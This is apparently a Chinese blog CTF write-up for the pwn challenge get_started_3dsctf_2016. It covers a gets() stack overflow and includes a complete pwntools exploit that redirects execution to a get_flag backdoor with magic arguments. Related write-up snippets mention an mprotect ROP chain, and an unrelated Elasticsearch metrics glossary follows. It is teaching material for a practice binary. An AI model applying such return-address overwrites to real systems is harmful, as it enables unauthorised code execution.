get_started_3dsctf_2016

最新推荐文章于 2025-01-22 01:23:33 发布
原创 最新推荐文章于 2025-01-22 01:23:33 发布 · 167 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #CTF #WriteUp #python #网络安全

本文详细介绍了如何分析一个CTF挑战,该挑战涉及到栈溢出漏洞和后门函数。通过checksec工具查看,发现只启用了栈不可执行保护。在IDA中深入分析,找到了一个名为get_flag()的后门函数,需要传入特定参数才能读取flag。解决方案是构造payload,利用栈溢出覆盖返回地址,跳转到get_flag()函数,并传递0x308CD64F和0x195719D1作为参数来获取flag。

get_started_3dsctf_2016

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行。

放进IDA中分析:
在这里插入图片描述

  • gets(&v4);:存在栈溢出

通过字符查找可找到一个后门函数get_flag(int a1, int a2)
在这里插入图片描述

  • if ( a1 == 0x308CD64F && a2 == 0x195719D1 ):判断传入的参数的值。
  • 如果if判断成功,则能读取到flag

题目思路

  • 存在栈溢出,可通过栈溢出覆盖返回地址跳到get_flag()

  • get_flag()传入参数0x308CD64F0x195719D1

步骤解析

无需

完整exp

from pwn import *

#start
r = process("../buu/get_started_3dsctf_2016")
# r = remote("node4.buuoj.cn",27098)
context.log_level = 'debug'

#params

#attack
payload = b'M'*56 + p32(0x080489A0) + p32(0x0804E6A0)+ p32(0x308CD64F) + p32(0x195719D1)
r.sendline(payload)

r.recv()
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 453
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
【BUUCTF-PWN】12-get_started_3dsctf_2016
燕麦葡萄干的博客
07-05 1499
垃圾数据–>mprotect函数地址–>三个连续的pop地址–>.got.plt表起始地址–>内存长度–>内存权限–>read函数–>三个连续的pop地址–>read函数的三个参数–> .got.plt表的起始位置。其中gets()函数存在栈溢出,溢出距离为0x38,这里是使用的esp寻址,属于外平栈,不需要覆盖ebp的四个字节。第二种是直接在IDA中查找,crtl+s调出程序的段表,这里还不太清楚怎么去选择可用的程序段,看很多博客都是直接用的.got.plt的起始位置。
Pwnget_started_3dsctf_2016
ethan18的博客
07-20 279
这是一个有点难度的题目,反正我是后面去看师傅们的wp了。。。这个题目听大家讲本地的和远程的exp居然还是有差别的首先拿到文件,开始老三样查看主要看在哪个平台:32位还是64位,还有就是有没有canary,如果有的话一般来说都不会是栈溢出攻击的题目然后拖进ida这个可以看出真的是一个栈溢出攻击我们还可以看到get_flag函数看出来是直接进行溢出到第8行地址就行。但是注意,可能是由于这题目远程的时候一些奇妙问题,在我们使用远程的时候没有正常退出会导致出错,无法获取回显。
BUUCTF get_started_3dsctf_2016
zwb2603096342的博客
07-07 1661
mprotect的运用
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.youkuaiyun.com/A951860555/article/details/111030289
pwnget_started_3dsctf_2016
最新发布
勿山几已
01-22 764
payload内容为从v4变量开始填充任意内容到函数返回地址,然后函数返回地址填充为ret_get_flag_addr即get_flag地址,为get_flag函数准备参数arg_a1,arg_a2,在32程序栈中,get_flag函数和参数中间有函数的返回地址,这里任意填入一个地址,如0x1。所以payload接下来的内容为read函数地址,但是程序在内存中mprotect函数执行完返回后和执行read地址间有mprotect三个参数的内容,这三个内存地址的内容需要处理,可以借用ROPgadget
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 773
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
CTFget_started_3dsctf_2016
凉水的博客
01-19 728
解题思路: 1 先反编译,第一印象代码比较多、杂,找main函数找了半天才找到。 undefined4 main(void) { char local_38 [56]; printf("Qual a palavrinha magica? "); gets(local_38); return 0; } 2 看main函数,第一感觉是典型的栈溢出。然后就是ELF的一些保护。 Arch: i386-32-little RELRO: Partial RELRO Stack:
cpu_sys_in_millis cpu_user_in_millis merge_threads merge_queue merge_active merge_rejected merge_largest merge_completed bulk_threads bulk_queue bulk_active bulk_rejected bulk_largest bulk_completed warmer_threads warmer_queue warmer_active warmer_rejected warmer_largest warmer_completed get_largest get_completed get_threads get_queue get_active get_rejected index_threads index_queue index_active index_rejected index_largest index_completed suggest_threads suggest_queue suggest_active suggest_rejected suggest_largest suggest_completed fetch_shard_store_queue fetch_shard_store_active fetch_shard_store_rejected fetch_shard_store_largest fetch_shard_store_completed fetch_shard_store_threads management_threads management_queue management_active management_rejected management_largest management_completed percolate_queue percolate_active percolate_rejected percolate_largest percolate_completed percolate_threads listener_active listener_rejected listener_largest listener_completed listener_threads listener_queue search_rejected search_largest search_completed search_threads search_queue search_active fetch_shard_started_threads fetch_shard_started_queue fetch_shard_started_active fetch_shard_started_rejected fetch_shard_started_largest fetch_shard_started_completed refresh_rejected refresh_largest refresh_completed refresh_threads refresh_queue refresh_active optimize_threads optimize_queue optimize_active optimize_rejected optimize_largest optimize_completed snapshot_largest snapshot_completed snapshot_threads snapshot_queue snapshot_active snapshot_rejected generic_threads generic_queue generic_active generic_rejected generic_largest generic_completed flush_threads flush_queue flush_active flush_rejected flush_largest flush_completed server_open rx_count rx_size_in_bytes tx_count tx_size_in_bytes
06-02
这些指标是Elasticsearch集群监控指标,包括: - cpu_sys_in_millis:集群中所有节点的系统CPU使用时间,即内核态时间。 - cpu_user_in_millis:集群中所有节点的用户CPU使用时间,即用户态时间。 - merge_threads/merge_queue/merge_active/merge_rejected/merge_largest/merge_completed:用于合并段(segments)的线程池监控指标。 - bulk_threads/bulk_queue/bulk_active/bulk_rejected/bulk_largest/bulk_completed:用于批量操作的线程池监控指标。 - warmer_threads/warmer_queue/warmer_active/warmer_rejected/warmer_largest/warmer_completed:用于预热索引的线程池监控指标。 - get_largest/get_completed/get_threads/get_queue/get_active/get_rejected:用于处理get请求的线程池监控指标。 - index_threads/index_queue/index_active/index_rejected/index_largest/index_completed:用于处理index请求的线程池监控指标。 - suggest_threads/suggest_queue/suggest_active/suggest_rejected/suggest_largest/suggest_completed:用于处理suggest请求的线程池监控指标。 - fetch_shard_store_queue/fetch_shard_store_active/fetch_shard_store_rejected/fetch_shard_store_largest/fetch_shard_store_completed/fetch_shard_store_threads:用于获取分片数据的线程池监控指标。 - management_threads/management_queue/management_active/management_rejected/management_largest/management_completed:用于管理操作的线程池监控指标。 - percolate_queue/percolate_active/percolate_rejected/percolate_largest/percolate_completed/percolate_threads:用于处理percolate请求的线程池监控指标。 - listener_active/listener_rejected/listener_largest/listener_completed/listener_threads/listener_queue:用于处理请求的监听器监控指标。 - search_rejected/search_largest/search_completed/search_threads/search_queue/search_active:用于处理search请求的线程池监控指标。 - fetch_shard_started_threads/fetch_shard_started_queue/fetch_shard_started_active/fetch_shard_started_rejected/fetch_shard_started_largest/fetch_shard_started_completed:用于获取分片数据的线程池监控指标。 - refresh_rejected/refresh_largest/refresh_completed/refresh_threads/refresh_queue/refresh_active:用于刷新操作的线程池监控指标。 - optimize_threads/optimize_queue/optimize_active/optimize_rejected/optimize_largest/optimize_completed:用于优化操作的线程池监控指标。 - snapshot_largest/snapshot_completed/snapshot_threads/snapshot_queue/snapshot_active/snapshot_rejected:用于快照操作的线程池监控指标。 - generic_threads/generic_queue/generic_active/generic_rejected/generic_largest/generic_completed:用于处理通用请求的线程池监控指标。 - flush_threads/flush_queue/flush_active/flush_rejected/flush_largest/flush_completed:用于刷新操作的线程池监控指标。 - server_open:当前打开的HTTP连接数。 - rx_count/rx_size_in_bytes:接收的HTTP请求数和数据量。 - tx_count/tx_size_in_bytes:发送的HTTP响应数和数据量。 这些指标可以帮助我们监控Elasticsearch集群的运行状态和性能,及时发现并解决潜在的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值